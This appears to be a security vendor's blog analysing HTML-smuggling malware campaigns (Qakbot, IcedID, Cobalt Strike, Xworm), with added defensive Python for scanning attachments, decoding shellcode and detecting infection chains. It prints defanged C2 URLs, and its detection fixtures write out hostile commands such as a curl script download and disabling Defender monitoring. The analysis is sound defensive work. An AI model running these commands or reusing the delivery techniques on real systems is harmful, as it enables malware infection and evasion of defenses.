HTML Smuggling: The Hidden Threat in Your Inbox
Last October, Trustwave SpiderLabs blogged about the use and prevalence of HTML email attachments to deliver malware and phishing for credentials. The use of HTML smuggling has become more prevalent, and we have since seen various cybercriminal groups utilizing these techniques to distribute malware.
HTML smuggling uses HTML5 and JavaScript features that work offline: the binary is stored as an immutable blob of data inside the JavaScript code. When the page is opened in a web browser, that data blob, the embedded payload, is decoded into a file object. Threat actors take advantage of the versatility of HTML, combined with social engineering, to lure the user into saving and opening the malicious payload.
HTML smuggling is not new, but it has gained in popularity, especially after Microsoft started blocking macros in documents from the Internet by default. What has not changed is the use of HTML smuggling to deliver the initial payload; the intermediate payload varies among ISO, IMG, and VHD image files.
The latest campaigns impersonate well-known brands like Adobe Acrobat, Google Drive, and Dropbox to increase the chances of users opening the archives.
In this blog, we will cover some notable malware strains that have utilized HTML smuggling in their infection chain and provide a brief analysis of each malware.
Qakbot
Qakbot, one of the notorious malware types actively distributed through spam, has been using HTML smuggling since June 2022. It shifted from macro documents to HTML as Microsoft pushed restrictions on using macros from the Internet.
Figure 1: Qakbot is delivered via HTML attachments as seen in our spam traps.
A Qakbot email campaign from September 2022 uses a plain template and does not impersonate well-known brands. Instead, the malware tricks the user into clicking the HTML attachment, which causes an encrypted ZIP archive to be saved to disk. The email and the HTML attachment contain the password to extract the ZIP content.
Figure 2: Spam email delivering Qakbot via an HTML attachment
Figure 3: HTML smuggling template
Looking at the HTML source code, the functions and methods used to assemble the payload are obfuscated into arrays, an attempt to conceal suspicious commands and evade email gateway filters. The technique abuses the msSaveOrOpenBlob JavaScript method to dynamically generate the malicious payload and drop it to disk.
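As an added example (not code from the original post), the following Python triage script shows what an email gateway or analyst can do with an HTML attachment of this kind: look for the browser APIs that write a blob to disk, pull out long base64 literals, decode them and identify the embedded file type (ZIP, ISO, VHD or PE), listing ZIP members and whether they are password-protected. The sample attachment it builds is constructed here; the length threshold and the API list beyond msSaveOrOpenBlob are assumptions.

```python
import base64
import io
import re
import zipfile

# Browser APIs that turn an in-page byte string into a file on disk. msSaveOrOpenBlob is
# the one seen in the Qakbot template; the rest are the standard Blob/download pattern.
SMUGGLING_APIS = ("msSaveOrOpenBlob", "msSaveBlob", "createObjectURL", "new Blob", "atob(")
# Quoted base64 runs long enough to hold a file (the 100-char threshold is an assumption).
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/=\s]{100,})['"]""")
# Magic bytes for the intermediate payload types discussed above, plus raw PE files.
MAGIC = {
    "zip": lambda d: d.startswith(b"PK\x03\x04"),
    "iso": lambda d: d[0x8001:0x8006] == b"CD001",          # ISO 9660 primary descriptor
    "vhd": lambda d: b"conectix" in d[:512] or b"conectix" in d[-512:],
    "pe": lambda d: d.startswith(b"MZ"),
}

def identify(data: bytes) -> str:
    return next((kind for kind, test in MAGIC.items() if test(data)), "unknown")

def scan_html(html: str) -> dict:
    """Report smuggling APIs present and every decodable embedded payload."""
    apis = [a for a in SMUGGLING_APIS if a in html]
    payloads = []
    for literal in B64_LITERAL.findall(html):
        try:
            data = base64.b64decode(re.sub(r"\s+", "", literal), validate=True)
        except ValueError:
            continue  # not real base64, skip it
        entry = {"type": identify(data), "size": len(data)}
        if entry["type"] == "zip":
            try:
                with zipfile.ZipFile(io.BytesIO(data)) as zf:
                    entry["members"] = zf.namelist()
                    # bit 0 of the general-purpose flag marks a password-protected member
                    entry["encrypted"] = any(i.flag_bits & 1 for i in zf.infolist())
            except zipfile.BadZipFile:
                entry["members"] = []  # looks like a ZIP header but the archive is malformed
        payloads.append(entry)
    return {"apis": apis, "payloads": payloads, "suspicious": bool(apis) and bool(payloads)}

def build_sample() -> str:
    """Constructed attachment mimicking the template above; not the real Qakbot file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("File577.lnk", b"constructed placeholder, not a real shortcut")
    blob = base64.b64encode(buf.getvalue()).decode()
    return ("<script>var b=new Blob([atob('" + blob + "')]);"
            "navigator.msSaveOrOpenBlob(b,'Document1611.zip');</script>")
```

Run `scan_html(build_sample())` to see the report; on a real attachment, "suspicious" plus a ZIP or ISO payload is the signal to quarantine the message for analysis.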
Figure 4: Obfuscated JavaScript code used for payload smuggling
Figure 5: ZIP archive drop containing a Windows Shortcut LNK
The dropped ZIP archive contains one file, a Windows Shortcut (LNK). Once the user opens the ZIP archive and launches the LNK file, it invokes the Windows Command Processor, which creates a download folder inside the %LOCALAPPDATA% directory, downloads a JavaScript file with the built-in curl tool, and executes it with WScript. The JavaScript file downloads the main payload, a Qakbot DLL. The payload is loaded using rundll32 and then injected into explorer.exe through process hollowing.
Figure 6: Infection chain of the Qakbot campaign
Figure 7: Qakbot campaign impersonating Google Drive
IcedID
Another infamous malware strain, IcedID, also known as Bokbot, has been observed using HTML smuggling. There is some overlap in the delivery method between IcedID and Qakbot, as the HTML templates we saw were nearly identical.
Figure 8: Thread-hijacked email delivering IcedID
Figure 9: HTML template spoofing a PDF viewer to lure targets to install IcedID
In this sample, IcedID was delivered through a thread-hijacked email with an HTML attachment. A thread-hijacked email is a legitimate email conversation into which threat actors have inserted malicious messages, links, or attachments. After loading in the browser, the HTML, impersonating a PDF document viewer, drops a password-protected ZIP archive containing an ISO disk image file; the HTML template itself contains the archive’s password. Inside the ISO file are an LNK file, a decoy PNG image, and the IcedID DLL. Clicking the LNK file launches a command line that opens the decoy PNG image while, in the background, rundll32 loads the initial IcedID DLL with the PluginInit parameter.
Figure 10: Command line to load decoy PNG image
Figure 11: Infection chain of IcedID campaign
Since 2017, IcedID has implemented a range of delivery methods favoring email as its initial access vector. It started as a banking trojan targeting financial institutions but has since evolved into a dropper of additional malware payloads, like ransomware, and has become an initial access provider for other threat actors seeking to establish a foothold on a target system.
Cobalt Strike
More recently, in December, we came across a spam email with an HTML attachment dropping Cobalt Strike. The HTML lure looks similar to the Qakbot and IcedID campaigns.
Figure 12: Infection chain of Cobalt Strike delivery through email with an HTML attachment
Figure 13: PDF viewer-themed HTML lure delivering Cobalt Strike
Figure 14: ISO package containing LNK shortcut, PowerShell scripts including Cobalt Strike, and a decoy document
When the HTML is loaded, it drops an ISO file containing an LNK file that, when clicked, launches the payload execution sequence. The LNK file starts PowerShell to execute a PowerShell script disguised with a ‘.log’ extension rather than ‘.ps1’. Changing the extension is an attempt to evade defenses and to trick the user into thinking it is an ordinary log file.
Figure 15: PowerShell script
The initial PowerShell script lays the groundwork for the successful execution of the Cobalt Strike payload. The script checks whether the target system is part of a domain. If it is, it disables Microsoft Defender’s real-time monitoring and then creates an LNK shortcut in the Startup folder pointing to the Cobalt Strike payload, as a form of persistence. Otherwise, it loads the decoy PDF document and terminates the sequence.
To conceal the malicious activity, the script loads the decoy PDF document before launching the main payload.
Figure 16: First stage PS1 script disabling antivirus, checking the system configuration, and setting up persistence
The initial and main PowerShell scripts obfuscate their variables and functions only by giving them random, lengthy names. For the sake of readability, we have shortened the variable names.
Figure 17: Cobalt Strike with base64-encoded shellcode
Before memory injection, the Cobalt Strike shellcode is decoded from base64 and then XORed byte by byte with the key 35. It connects to its C2 server at hxxp[://]165[.]22[.]48[.]183/common?chunk=false.
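As an added example (not the campaign's own code), here is the analyst-side reversal of that encoding in Python: base64-decode the blob, then XOR with 35. It also generalises to the case where the loader does not reveal the key, by trying all 256 single-byte keys against bytes the analyst expects at the start of the shellcode. The sample blob is constructed; the assumed expected prefix is the "cld; and rsp,-16" prologue that x64 Windows stagers commonly begin with, not bytes taken from this campaign.

```python
import base64

def decode_blob(b64_text: str, key: int = 35) -> bytes:
    """Reverse the two-step encoding: base64, then a single-byte XOR with `key`."""
    return bytes(b ^ key for b in base64.b64decode(b64_text))

def recover_xor_key(encoded: bytes, known_prefix: bytes):
    """Brute-force a single-byte XOR key when the loader does not reveal it.
    Only 256 candidates exist, so try each against the bytes the analyst expects
    at the start of the decoded shellcode; returns None if no key fits."""
    for key in range(256):
        if bytes(b ^ key for b in encoded[: len(known_prefix)]) == known_prefix:
            return key
    return None

# Constructed sample, not the shellcode from the campaign: the assumed prefix is the
# "cld; and rsp,-16" prologue (fc 48 83 e4 f0) common to x64 Windows stagers,
# followed by filler bytes, encoded the same way the page describes (XOR 35, base64).
STAGER_PROLOGUE = bytes.fromhex("fc4883e4f0")
SAMPLE_SHELLCODE = STAGER_PROLOGUE + bytes(range(64))
SAMPLE_B64 = base64.b64encode(bytes(b ^ 35 for b in SAMPLE_SHELLCODE)).decode()

if __name__ == "__main__":
    raw = decode_blob(SAMPLE_B64, key=0)  # key 0 leaves the base64-decoded bytes untouched
    print("recovered key:", recover_xor_key(raw, STAGER_PROLOGUE))
    print("round trip OK:", decode_blob(SAMPLE_B64) == SAMPLE_SHELLCODE)
```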
Xworm RAT
One of the more interesting samples we uncovered in our spam traps is an Xworm RAT, a .NET-compiled malware capable of monitoring user activity, including keystrokes and screen activity.
Figure 18: Email campaign delivering the Xworm RAT
The email purports to be from the U.S. Postal System, with the subject line “Your shipment is out for delivery”, and includes an HTML file attachment. When the recipient opens the HTML, it is loaded in the browser and automatically drops an ISO disk image onto the target system.
The ISO file contains a Visual Basic Script (VBS) file. The user must open the ISO file so that it is mounted, and then double-click the VBScript file for the infection chain to continue.
When executed, the VBScript launches PowerShell commands to retrieve two encoded blobs. Below is the final PowerShell command launched:
Figure 19: Final PowerShell command launch
The first blob is retrieved from hxxp://5[.]42[.]199[.]235/dll/dll2.txt. The PowerShell script then decodes the base64-encoded blob into a DLL file. This first DLL has the following capabilities:
- Creates a copy of the VBS file in the Startup folder
- Sets the VBS persistence through a scheduled task
- Downloads the stager DLL which will serve as the loader of the second blob or the main payload
The second blob is downloaded from hxxps://beautiful-elion[.]68-64-160-26[.]plesk[.]page/weslle.txt. Like the first blob, the base64-encoded file is converted into a DLL file. This main payload turns out to be an Xworm RAT.
The code shown below is from the first DLL; highlighted is the method “PUlGKA”, which is invoked through the VBScript command. It downloads and decodes the stager DLL from hxxp://5[.]42[.]199[.]235/pe/Pe.txt. From there, the stager runs the Xworm DLL through the built-in Windows tool Regasm.
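The four infection chains described above (Qakbot's cmd.exe launching curl and WScript, IcedID's rundll32 with the PluginInit parameter, the Cobalt Strike scripts run from a '.log' file and disabling Defender real-time monitoring, and Xworm's hand-off to Regasm) share process-creation behaviours that endpoint telemetry can catch. The following Python is an added example, not the post's or any product's code, that runs such rules over constructed process-creation events; the event field names, the exact command lines, and the assumption that Defender was disabled via the DisableRealtimeMonitoring setting are mine, not taken from the samples.

```python
import re

# Each rule: (name, predicate over one process-creation event). The fields parent, image
# and cmdline are an assumed log schema, not a specific product's format.
RULES = [
    ("qakbot-like: cmd.exe launching curl or wscript",
     lambda e: e["parent"] == "cmd.exe" and e["image"] in ("curl.exe", "wscript.exe")),
    ("icedid-like: rundll32 invoking a PluginInit export",
     lambda e: e["image"] == "rundll32.exe" and "PluginInit" in e["cmdline"]),
    ("cobaltstrike-like: PowerShell running a .log file as a script",
     lambda e: e["image"] == "powershell.exe" and re.search(r"\S+\.log\b", e["cmdline"], re.I)),
    ("defender tampering: real-time monitoring disabled (assumed cmdlet setting)",
     lambda e: "DisableRealtimeMonitoring" in e["cmdline"]),
    ("xworm-like: PowerShell launching regasm.exe",
     lambda e: e["parent"] == "powershell.exe" and e["image"] == "regasm.exe"),
]

def evaluate(events):
    """Return (rule name, event) pairs for every event that matches a rule."""
    hits = []
    for event in events:
        for name, predicate in RULES:
            if predicate(event):
                hits.append((name, event))
    return hits

# Constructed sample events modelled on the chains above; not real telemetry.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c <shortcut command>"},
    {"parent": "cmd.exe", "image": "curl.exe",
     "cmdline": "curl.exe -o %LOCALAPPDATA%\\dl\\x.js https://example.invalid/x.html"},
    {"parent": "cmd.exe", "image": "wscript.exe", "cmdline": "wscript.exe %LOCALAPPDATA%\\dl\\x.js"},
    {"parent": "cmd.exe", "image": "rundll32.exe", "cmdline": "rundll32.exe icedid.W6_,PluginInit"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File bbftullzytwpbp.log"},
    {"parent": "powershell.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"parent": "powershell.exe", "image": "regasm.exe", "cmdline": "regasm.exe constructed.dll"},
    # benign control: a scheduled maintenance script, should produce no hit
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for name, event in evaluate(SAMPLE_EVENTS):
        print(f"[{name}] {event['parent']} -> {event['cmdline']}")
```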
Figure 20: PUlGKA method
Figure 21: Attack sequence of a campaign that starts from email then ends with Xworm RAT dropped.
Conclusion
The shift in malware delivery methods toward HTML is concerning, as it challenges email gateway scanners, endpoint protection, and security solutions, especially their ability to unpack, decode, and detect such techniques. With HTML smuggling, the malware is concealed from the scanners: most antivirus engines see only an HTML attachment, whereas an ISO file attachment would immediately raise red flags. Combining HTML smuggling with archives and disk images as intermediate payloads raises the chances of delivering malware and gaining initial access. Threat actors are crafty in their lures, mixing various social engineering techniques and exploring different attack chains to gain a foothold on the target’s system.
We expect to see more sophisticated malware delivered through HTML smuggling, with more compelling lures impersonating well-known products and social engineering tricks, complex obfuscation at the HTML level evading signature-based detection, and diverse attack sequences that may require more user interaction but may still be effective in gaining initial access.
We always remind everyone to stay vigilant in this ever-changing digital landscape.
Indicators of Compromise